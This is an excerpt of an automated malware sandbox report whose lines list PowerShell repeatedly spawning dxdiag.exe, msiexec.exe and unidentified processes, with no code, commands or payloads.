    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\SysWOW64\dxdiag.exe"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: unknown unknownJump to behavior
